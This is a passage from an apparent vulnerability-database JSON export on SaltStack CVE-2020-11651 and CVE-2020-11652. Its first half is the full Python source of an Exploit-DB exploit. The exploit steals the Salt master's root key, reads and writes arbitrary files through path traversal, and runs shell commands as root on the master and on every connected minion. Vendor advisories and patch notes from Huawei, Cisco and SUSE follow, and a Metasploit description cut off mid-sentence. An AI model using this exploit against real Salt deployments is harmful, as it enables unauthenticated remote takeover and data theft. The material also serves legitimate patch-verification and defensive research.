"privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-05-05T00:00:00", "type": "exploitdb", "title": "Saltstack 3000.1 - Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11652", "CVE-2020-11651"], "modified": "2020-05-05T00:00:00", "id": "EDB-ID:48421", "href": "https://www.exploit-db.com/exploits/48421", "sourceData": "# Exploit Title: Saltstack 3000.1 - Remote Code Execution\r\n# Date: 2020-05-04\r\n# Exploit Author: Jasper Lievisse Adriaanse\r\n# Vendor Homepage: https://www.saltstack.com/\r\n# Version: < 3000.2, < 2019.2.4, 2017.*, 2018.*\r\n# Tested on: Debian 10 with Salt 2019.2.0\r\n# CVE : CVE-2020-11651 and CVE-2020-11652\r\n# Discription: Saltstack authentication bypass/remote code execution\r\n#\r\n# Source: https://github.com/jasperla/CVE-2020-11651-poc\r\n# This exploit is based on this checker script:\r\n# https://github.com/rossengeorgiev/salt-security-backports\r\n\r\n#!/usr/bin/env python\r\n#\r\n# Exploit for CVE-2020-11651 and CVE-2020-11652\r\n# Written by Jasper Lievisse Adriaanse (https://github.com/jasperla/CVE-2020-11651-poc)\r\n# This exploit is based on this checker script:\r\n# https://github.com/rossengeorgiev/salt-security-backports\r\n\r\nfrom __future__ import absolute_import, print_function, unicode_literals\r\nimport argparse\r\nimport datetime\r\nimport os\r\nimport os.path\r\nimport sys\r\nimport time\r\n\r\nimport salt\r\nimport salt.version\r\nimport salt.transport.client\r\nimport salt.exceptions\r\n\r\ndef init_minion(master_ip, master_port):\r\n minion_config = {\r\n 'transport': 'zeromq',\r\n 'pki_dir': '/tmp',\r\n 'id': 'root',\r\n 'log_level': 'debug',\r\n 'master_ip': master_ip,\r\n 'master_port': master_port,\r\n 'auth_timeout': 5,\r\n 'auth_tries': 1,\r\n 'master_uri': 'tcp://{0}:{1}'.format(master_ip, master_port)\r\n }\r\n\r\n return salt.transport.client.ReqChannel.factory(minion_config, crypt='clear')\r\n\r\n# --- check funcs ----\r\n\r\ndef check_salt_version():\r\n print(\"[+] Salt version: {}\".format(salt.version.__version__))\r\n\r\n vi = salt.version.__version_info__\r\n\r\n if (vi < (2019, 2, 4) or (3000,) <= vi < (3000, 2)):\r\n return True\r\n else:\r\n return False\r\n\r\ndef check_connection(master_ip, master_port, channel):\r\n print(\"[+] Checking salt-master ({}:{}) status... \".format(master_ip, master_port), end='')\r\n sys.stdout.flush()\r\n\r\n # connection check\r\n try:\r\n channel.send({'cmd':'ping'}, timeout=2)\r\n except salt.exceptions.SaltReqTimeoutError:\r\n print(\"OFFLINE\")\r\n sys.exit(1)\r\n else:\r\n print(\"ONLINE\")\r\n\r\ndef check_CVE_2020_11651(channel):\r\n print(\"[+] Checking if vulnerable to CVE-2020-11651... \", end='')\r\n sys.stdout.flush()\r\n # try to evil\r\n try:\r\n rets = channel.send({'cmd': '_prep_auth_info'}, timeout=3)\r\n except salt.exceptions.SaltReqTimeoutError:\r\n print(\"YES\")\r\n except:\r\n print(\"ERROR\")\r\n raise\r\n else:\r\n pass\r\n finally:\r\n if rets:\r\n root_key = rets[2]['root']\r\n return root_key\r\n\r\n return None\r\n\r\ndef check_CVE_2020_11652_read_token(debug, channel, top_secret_file_path):\r\n print(\"[+] Checking if vulnerable to CVE-2020-11652 (read_token)... \", end='')\r\n sys.stdout.flush()\r\n\r\n # try read file\r\n msg = {\r\n 'cmd': 'get_token',\r\n 'arg': [],\r\n 'token': top_secret_file_path,\r\n }\r\n\r\n try:\r\n rets = channel.send(msg, timeout=3)\r\n except salt.exceptions.SaltReqTimeoutError:\r\n print(\"YES\")\r\n except:\r\n print(\"ERROR\")\r\n raise\r\n else:\r\n if debug:\r\n print()\r\n print(rets)\r\n print(\"NO\")\r\n \r\ndef check_CVE_2020_11652_read(debug, channel, top_secret_file_path, root_key):\r\n print(\"[+] Checking if vulnerable to CVE-2020-11652 (read)... \", end='')\r\n sys.stdout.flush()\r\n\r\n # try read file\r\n msg = {\r\n 'key': root_key,\r\n 'cmd': 'wheel',\r\n 'fun': 'file_roots.read',\r\n 'path': top_secret_file_path,\r\n 'saltenv': 'base',\r\n }\r\n\r\n try:\r\n rets = channel.send(msg, timeout=3)\r\n except salt.exceptions.SaltReqTimeoutError:\r\n print(\"TIMEOUT\")\r\n except:\r\n print(\"ERROR\")\r\n raise\r\n else:\r\n if debug:\r\n print()\r\n print(rets)\r\n if rets['data']['return']:\r\n print(\"YES\")\r\n else:\r\n print(\"NO\")\r\n\r\ndef check_CVE_2020_11652_write1(debug, channel, root_key):\r\n print(\"[+] Checking if vulnerable to CVE-2020-11652 (write1)... \", end='')\r\n sys.stdout.flush()\r\n\r\n # try read file\r\n msg = {\r\n 'key': root_key,\r\n 'cmd': 'wheel',\r\n 'fun': 'file_roots.write',\r\n 'path': '../../../../../../../../tmp/salt_CVE_2020_11652',\r\n 'data': 'evil',\r\n 'saltenv': 'base',\r\n }\r\n\r\n try:\r\n rets = channel.send(msg, timeout=3)\r\n except salt.exceptions.SaltReqTimeoutError:\r\n print(\"TIMEOUT\")\r\n except:\r\n print(\"ERROR\")\r\n raise\r\n else:\r\n if debug:\r\n print()\r\n print(rets)\r\n\r\n pp(rets)\r\n if rets['data']['return'].startswith('Wrote'):\r\n try:\r\n os.remove('/tmp/salt_CVE_2020_11652')\r\n except OSError:\r\n print(\"Maybe?\")\r\n else:\r\n print(\"YES\")\r\n else:\r\n print(\"NO\")\r\n\r\ndef check_CVE_2020_11652_write2(debug, channel, root_key):\r\n print(\"[+] Checking if vulnerable to CVE-2020-11652 (write2)... \", end='')\r\n sys.stdout.flush()\r\n\r\n # try read file\r\n msg = {\r\n 'key': root_key,\r\n 'cmd': 'wheel',\r\n 'fun': 'config.update_config',\r\n 'file_name': '../../../../../../../../tmp/salt_CVE_2020_11652',\r\n 'yaml_contents': 'evil',\r\n 'saltenv': 'base',\r\n }\r\n\r\n try:\r\n rets = channel.send(msg, timeout=3)\r\n except salt.exceptions.SaltReqTimeoutError:\r\n print(\"TIMEOUT\")\r\n except:\r\n print(\"ERROR\")\r\n raise\r\n else:\r\n if debug:\r\n print()\r\n print(rets)\r\n if rets['data']['return'].startswith('Wrote'):\r\n try:\r\n os.remove('/tmp/salt_CVE_2020_11652.conf')\r\n except OSError:\r\n print(\"Maybe?\")\r\n else:\r\n print(\"YES\")\r\n else:\r\n print(\"NO\")\r\n\r\ndef pwn_read_file(channel, root_key, path, master_ip):\r\n print(\"[+] Attemping to read {} from {}\".format(path, master_ip))\r\n sys.stdout.flush()\r\n\r\n msg = {\r\n 'key': root_key,\r\n 'cmd': 'wheel',\r\n 'fun': 'file_roots.read',\r\n 'path': path,\r\n 'saltenv': 'base',\r\n }\r\n\r\n rets = channel.send(msg, timeout=3)\r\n print(rets['data']['return'][0][path])\r\n\r\ndef pwn_upload_file(channel, root_key, src, dest, master_ip):\r\n print(\"[+] Attemping to upload {} to {} on {}\".format(src, dest, master_ip))\r\n sys.stdout.flush()\r\n\r\n try:\r\n fh = open(src, 'rb')\r\n payload = fh.read()\r\n fh.close()\r\n except Exception as e:\r\n print('[-] Failed to read {}: {}'.format(src, e))\r\n return\r\n\r\n msg = {\r\n 'key': root_key,\r\n 'cmd': 'wheel',\r\n 'fun': 'file_roots.write',\r\n 'saltenv': 'base',\r\n 'data': payload,\r\n 'path': dest,\r\n }\r\n\r\n rets = channel.send(msg, timeout=3)\r\n print('[ ] {}'.format(rets['data']['return']))\r\n\r\ndef pwn_exec(channel, root_key, cmd, master_ip, jid):\r\n print(\"[+] Attemping to execute {} on {}\".format(cmd, master_ip))\r\n sys.stdout.flush()\r\n\r\n msg = {\r\n 'key': root_key,\r\n 'cmd': 'runner',\r\n 'fun': 'salt.cmd',\r\n 'saltenv': 'base',\r\n 'user': 'sudo_user',\r\n 'kwarg': {\r\n 'fun': 'cmd.exec_code',\r\n 'lang': 'python',\r\n 'code': \"import subprocess;subprocess.call('{}',shell=True)\".format(cmd)\r\n },\r\n 'jid': jid,\r\n }\r\n\r\n try:\r\n rets = channel.send(msg, timeout=3)\r\n except Exception as e:\r\n print('[-] Failed to submit job')\r\n return\r\n\r\n if rets.get('jid'):\r\n print('[+] Successfully scheduled job: {}'.format(rets['jid']))\r\n\r\ndef pwn_exec_all(channel, root_key, cmd, master_ip, jid):\r\n print(\"[+] Attemping to execute '{}' on all minions connected to {}\".format(cmd, master_ip))\r\n sys.stdout.flush()\r\n\r\n msg = {\r\n 'key': root_key,\r\n 'cmd': '_send_pub',\r\n 'fun': 'cmd.run',\r\n 'user': 'root',\r\n 'arg': [ \"/bin/sh -c '{}'\".format(cmd) ],\r\n 'tgt': '*',\r\n 'tgt_type': 'glob',\r\n 'ret': '',\r\n 'jid': jid\r\n }\r\n\r\n try:\r\n rets = channel.send(msg, timeout=3)\r\n except Exception as e:\r\n print('[-] Failed to submit job')\r\n return\r\n finally:\r\n if rets == None:\r\n print('[+] Successfully submitted job to all minions.')\r\n else:\r\n print('[-] Failed to submit job')\r\n\r\n\r\ndef main():\r\n parser = argparse.ArgumentParser(description='Saltstack exploit for CVE-2020-11651 and CVE-2020-11652')\r\n parser.add_argument('--master', '-m', dest='master_ip', default='127.0.0.1')\r\n parser.add_argument('--port', '-p', dest='master_port', default='4506')\r\n parser.add_argument('--force', '-f', dest='force', default=False, action='store_false')\r\n parser.add_argument('--debug', '-d', dest='debug', default=False, action='store_true')\r\n parser.add_argument('--run-checks', '-c', dest='run_checks', default=False, action='store_true')\r\n parser.add_argument('--read', '-r', dest='read_file')\r\n parser.add_argument('--upload-src', dest='upload_src')\r\n parser.add_argument('--upload-dest', dest='upload_dest')\r\n parser.add_argument('--exec', dest='exec', help='Run a command on the master')\r\n parser.add_argument('--exec-all', dest='exec_all', help='Run a command on all minions')\r\n args = parser.parse_args()\r\n\r\n print(\"[!] Please only use this script to verify you have correctly patched systems you have permission to access. Hit ^C to abort.\")\r\n time.sleep(1)\r\n\r\n # Both src and destination are required for uploads\r\n if (args.upload_src and args.upload_dest is None) or (args.upload_dest and args.upload_src is None):\r\n print('[-] Must provide both --upload-src and --upload-dest')\r\n sys.exit(1)\r\n\r\n channel = init_minion(args.master_ip, args.master_port)\r\n\r\n if check_salt_version():\r\n print(\"[ ] This version of salt is vulnerable! Check results below\")\r\n elif args.force:\r\n print(\"[*] This version of salt does NOT appear vulnerable. Proceeding anyway as requested.\")\r\n else:\r\n sys.exit()\r\n\r\n check_connection(args.master_ip, args.master_port, channel)\r\n \r\n root_key = check_CVE_2020_11651(channel)\r\n if root_key:\r\n print('\\n[*] root key obtained: {}'.format(root_key))\r\n else:\r\n print('[-] Failed to find root key...aborting')\r\n sys.exit(127)\r\n\r\n if args.run_checks:\r\n # Assuming this check runs on the master itself, create a file with \"secret\" content\r\n # and abuse CVE-2020-11652 to read it.\r\n top_secret_file_path = '/tmp/salt_cve_teta'\r\n with salt.utils.fopen(top_secret_file_path, 'w') as fd:\r\n fd.write(\"top secret\")\r\n\r\n # Again, this assumes we're running this check on the master itself\r\n with salt.utils.fopen('/var/cache/salt/master/.root_key') as keyfd:\r\n root_key = keyfd.read()\r\n\r\n check_CVE_2020_11652_read_token(debug, channel, top_secret_file_path)\r\n check_CVE_2020_11652_read(debug, channel, top_secret_file_path, root_key)\r\n check_CVE_2020_11652_write1(debug, channel, root_key)\r\n check_CVE_2020_11652_write2(debug, channel, root_key)\r\n os.remove(top_secret_file_path)\r\n sys.exit(0)\r\n\r\n if args.read_file:\r\n pwn_read_file(channel, root_key, args.read_file, args.master_ip)\r\n\r\n if args.upload_src:\r\n if os.path.isabs(args.upload_dest):\r\n print('[-] Destination path must be relative; aborting')\r\n sys.exit(1)\r\n pwn_upload_file(channel, root_key, args.upload_src, args.upload_dest, args.master_ip)\r\n\r\n\r\n jid = '{0:%Y%m%d%H%M%S%f}'.format(datetime.datetime.utcnow())\r\n\r\n if args.exec:\r\n pwn_exec(channel, root_key, args.exec, args.master_ip, jid)\r\n\r\n if args.exec_all:\r\n print(\"[!] Lester, is this what you want? Hit ^C to abort.\")\r\n time.sleep(2)\r\n pwn_exec_all(channel, root_key, args.exec_all, args.master_ip, jid)\r\n\r\n\r\nif __name__ == '__main__':\r\n main()", "sourceHref": "https://www.exploit-db.com/download/48421", "cvss": {"score": 0.0, "vector": "NONE"}}], "huawei": [{"lastseen": "2020-07-15T05:25:33", "description": "An authentication bypass vulnerability was discovered in SaltStack Salt. An attacker may exploit the vulnerability to retrieve user tokens from the salt master and/or run arbitrary commands on salt minions. (Vulnerability ID: HWPSIRT-2020-05592)\nThis vulnerability has been assigned a Common Vulnerabilities and Exposures (CVE) ID: CVE-2020-11651.\nA directory traversal vulnerability was discovered in SaltStack Salt. The salt-master process ClearFuncs class allows access to some methods that improperly sanitize paths. An authenticated attacker may exploit this vulnerability to access any directories. (Vulnerability ID: HWPSIRT-2020-05594)\nThis vulnerability has been assigned a Common Vulnerabilities and Exposures (CVE) ID: CVE-2020-11652.\nHuawei has released software updates to fix these vulnerabilities. This advisory is available at the following link:\nhttp://www.huawei.com/en/psirt/security-advisories/huawei-sa-20200715-01-salt-en", "edition": 3, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-07-15T00:00:00", "title": "Security Advisory - Two Vulnerabilities in SaltStack Salt", "type": "huawei", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11652", "CVE-2020-11651"], "modified": "2020-07-15T00:00:00", "id": "HUAWEI-SA-20200715-01-SALT", "href": "https://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20200715-01-salt-en", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cisco": [{"lastseen": "2021-07-28T16:26:40", "description": "On April 29, 2020, the Salt Open Core team notified their community regarding the following two CVE-IDs:\n\nCVE-2020-11651: Authentication Bypass Vulnerability\nCVE-2020-11652: Directory Traversal Vulnerability\n\nCisco Modeling Labs Corporate Edition (CML), Cisco TelePresence IX5000 Series, and Cisco Virtual Internet Routing Lab Personal Edition (VIRL-PE) incorporate a version of SaltStack that is running the salt-master service that is affected by these vulnerabilities.\n\nCisco has released software updates that address these vulnerabilities. There are workarounds that address these vulnerabilities.\n\nThis advisory is available at the following link:\nhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-salt-2vx545AG [\"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-salt-2vx545AG\"]", "cvss3": {}, "published": "2020-05-28T16:00:00", "type": "cisco", "title": "SaltStack FrameWork Vulnerabilities Affecting Cisco Products", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2020-11651", "CVE-2020-11652"], "modified": "2020-06-16T15:17:35", "id": "CISCO-SA-SALT-2VX545AG", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-salt-2vx545AG", "cvss": {"score": 10.0, "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"}}], "suse": [{"lastseen": "2021-07-28T20:14:03", "description": "An update that fixes two vulnerabilities is now available.\n\nDescription:\n\n This update for salt fixes the following issues:\n\n - Fix CVE-2020-11651 and CVE-2020-11652 (bsc#1170595)\n\n This update was imported from the SUSE:SLE-15-SP1:Update update project.\n\n\nPatch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended installation methods\n like YaST online_update or \"zypper patch\".\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.1:\n\n zypper in -t patch openSUSE-2020-564=1", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-04-30T14:21:39", "type": "suse", "title": "Security update for salt (critical)", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11651", "CVE-2020-11652"], "modified": "2020-04-30T14:21:39", "id": "OPENSUSE-SU-2020:0564-1", "href": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/SSOLZPKWSWDPR4VMI5Q3QMPA72BQNRCM/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T20:13:50", "description": "An update that solves four vulnerabilities and has 7 fixes\n is now available.\n\nDescription:\n\n This update for salt contains the following fixes:\n\n - Fix for TypeError in Tornado importer (bsc#1174165)\n - Require python3-distro only for TW (bsc#1173072)\n - Update to Salt version 3000: See release notes:\n https://docs.saltstack.com/en/latest/topics/releases/3000.html\n\n - Add docker.logout to docker execution module. (bsc#1165572)\n - Add option to enable/disable force refresh for zypper.\n - Add publish_batch to ClearFuncs exposed methods.\n - Adds test for zypper abbreviation fix.\n - Avoid segfault from \"salt-api\" under certain conditions of heavy load\n managing SSH minions. (bsc#1169604)\n - Avoid traceback on debug logging for swarm module. (bsc#1172075)\n - Batch mode now also correctly provides return value. (bsc#1168340)\n - Better import cache handline.\n - Do not make file.recurse state to fail when msgpack 0.5.4. (bsc#1167437)\n - Do not require vendored backports-abc. (bsc#1170288)\n - Fix errors from unit tests due NO_MOCK and NO_MOCK_REASON deprecation.\n - Fix for low rpm_lowpkg unit test.\n - Fix for temp folder definition in loader unit test.\n - Fix for unless requisite when pip is not installed.\n - Fix integration test failure for test_mod_del_repo_multiline_values.\n - Fix regression in service states with reload argument.\n - Fix tornado imports and missing _utils after rebasing patches.\n - Fix status attribute issue in aptpkg test.\n - Improved storage pool or network handling.\n - loop: fix variable names for until_no_eval.\n - Make \"salt.ext.tornado.gen\" to use \"salt.ext.backports_abc\" on Python 2.\n - Make setup.py script not to require setuptools greater than 9.1.\n - More robust remote port detection.\n - Prevent sporious \"salt-api\" stuck processes when managing SSH minions.\n because of logging deadlock. (bsc#1159284)\n - Python3.8 compatibility changes.\n - Removes unresolved merge conflict in yumpkg module.\n - Returns a the list of IPs filtered by the optional network list.\n - Revert broken changes to slspath made on Salt 3000\n (saltstack/salt#56341). (bsc#1170104)\n - Sanitize grains loaded from roster_grains.json cache during \"state.pkg\".\n - Various virt backports from 3000.2.\n - zypperpkg: filter patterns that start with dot. (bsc#1171906)\n\n This update was imported from the SUSE:SLE-15-SP1:Update update project.\n\n\nPatch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended installation methods\n like YaST online_update or \"zypper patch\".\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.1:\n\n zypper in -t patch openSUSE-2020-1074=1", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-07-26T11:13:15", "type": "suse", "title": "Security update for salt (moderate)", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15750", "CVE-2018-15751", "CVE-2020-11651", "CVE-2020-11652"], "modified": "2020-07-26T11:13:15", "id": "OPENSUSE-SU-2020:1074-1", "href": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/6GW2K66LI6CQMXXR5ABJWHGQK64P5J5Y/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T20:12:20", "description": "An update that solves 7 vulnerabilities, contains three\n features and has three fixes is now available.\n\nDescription:\n\n This update for salt fixes the following issues:\n\n Update to Salt release version 3002.2 (jsc#ECO-3212, jsc#SLE-18033,\n jsc#SLE-18028)\n\n - Check if dpkgnotify is executable (bsc#1186674)\n - Drop support for Python2. Obsoletes `python2-salt` package\n (jsc#SLE-18028)\n - virt module updates\n * network: handle missing ipv4 netmask attribute\n * more network support\n * PCI/USB host devices passthrough support\n - Set distro requirement to oldest supported version in\n requirements/base.txt\n - Bring missing part of async batch implementation back (CVE-2021-25315,\n bsc#1182382)\n - Always require `python3-distro` (bsc#1182293)\n - Remove deprecated warning that breaks minion execution when\n \"server_id_use_crc\" opts is missing\n - Fix pkg states when DEB package has \"all\" arch\n - Do not force beacons configuration to be a list.\n - Remove msgpack < 1.0.0 from base requirements (bsc#1176293)\n - msgpack support for version >= 1.0.0 (bsc#1171257)\n - Fix issue parsing errors in ansiblegate state module\n - Prevent command injection in the snapper module (bsc#1185281,\n CVE-2021-31607)\n - transactional_update: detect recursion in the executor\n - Add subpackage salt-transactional-update (jsc#SLE-18033)\n - Improvements on \"ansiblegate\" module (bsc#1185092):\n * New methods: ansible.targets / ansible.discover_playbooks\n - Add support for Alibaba Cloud Linux 2 (Aliyun Linux)\n - Regression fix of salt-ssh on processing targets\n - Update target fix for salt-ssh and avoiding race condition on salt-ssh\n event processing (bsc#1179831, bsc#1182281)\n - Add notify beacon for Debian/Ubuntu systems\n - Fix zmq bug that causes salt-call to freeze (bsc#1181368)\n\n\nPatch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended installation methods\n like YaST online_update or \"zypper patch\".\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.3:\n\n zypper in -t patch openSUSE-SLE-15.3-2021-2106=1", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2021-07-11T12:42:40", "type": "suse", "title": "Security update for salt (critical)", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15750", "CVE-2018-15751", "CVE-2020-11651", "CVE-2020-11652", "CVE-2020-25592", "CVE-2021-25315", "CVE-2021-31607"], "modified": "2021-07-11T12:42:40", "id": "OPENSUSE-SU-2021:2106-1", "href": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/MU6P3NIODW6ZMC4HZLBROO6ZEOD5KAUX/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T20:12:24", "description": "An update that solves 7 vulnerabilities, contains three\n features and has three fixes is now available.\n\nDescription:\n\n This update for salt fixes the following issues:\n\n Update to Salt release version 3002.2 (jsc#ECO-3212, jsc#SLE-18033,\n jsc#SLE-18028)\n\n - Check if dpkgnotify is executable (bsc#1186674)\n - Drop support for Python2. Obsoletes `python2-salt` package\n (jsc#SLE-18028)\n - virt module updates\n * network: handle missing ipv4 netmask attribute\n * more network support\n * PCI/USB host devices passthrough support\n - Set distro requirement to oldest supported version in\n requirements/base.txt\n - Bring missing part of async batch implementation back (CVE-2021-25315,\n bsc#1182382)\n - Always require `python3-distro` (bsc#1182293)\n - Remove deprecated warning that breaks minion execution when\n \"server_id_use_crc\" opts is missing\n - Fix pkg states when DEB package has \"all\" arch\n - Do not force beacons configuration to be a list.\n - Remove msgpack < 1.0.0 from base requirements (bsc#1176293)\n - msgpack support for version >= 1.0.0 (bsc#1171257)\n - Fix issue parsing errors in ansiblegate state module\n - Prevent command injection in the snapper module (bsc#1185281,\n CVE-2021-31607)\n - transactional_update: detect recursion in the executor\n - Add subpackage salt-transactional-update (jsc#SLE-18033)\n - Improvements on \"ansiblegate\" module (bsc#1185092):\n * New methods: ansible.targets / ansible.discover_playbooks\n - Add support for Alibaba Cloud Linux 2 (Aliyun Linux)\n - Regression fix of salt-ssh on processing targets\n - Update target fix for salt-ssh and avoiding race condition on salt-ssh\n event processing (bsc#1179831, bsc#1182281)\n - Add notify beacon for Debian/Ubuntu systems\n - Fix zmq bug that causes salt-call to freeze (bsc#1181368)\n\n This update was imported from the SUSE:SLE-15-SP2:Update update project.\n\n\nPatch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended installation methods\n like YaST online_update or \"zypper patch\".\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.2:\n\n zypper in -t patch openSUSE-2021-899=1", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2021-06-23T11:26:23", "type": "suse", "title": "Security update for salt (critical)", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15750", "CVE-2018-15751", "CVE-2020-11651", "CVE-2020-11652", "CVE-2020-25592", "CVE-2021-25315", "CVE-2021-31607"], "modified": "2021-06-23T11:26:23", "id": "OPENSUSE-SU-2021:0899-1", "href": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/6E3YAO2VV3WBUS7PMAT26ZYDS3AXW5VL/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2020-10-13T23:41:23", "description": "This module exploits unauthenticated access to the runner() and _send_pub() methods in the SaltStack Salt master's ZeroMQ request server, for versions 2019.2.3 and earlier and 3000.1 and earlier, to execute code as root on either the master or on select minions. VMware vRealize Operations Manager versions 7.5.0 through 8.1.0, as well as Cisco Modeling Labs Corporate Edition (CML) and Cisco Virtual Internet Routing Lab Personal Edition (VIRL-PE), for versions 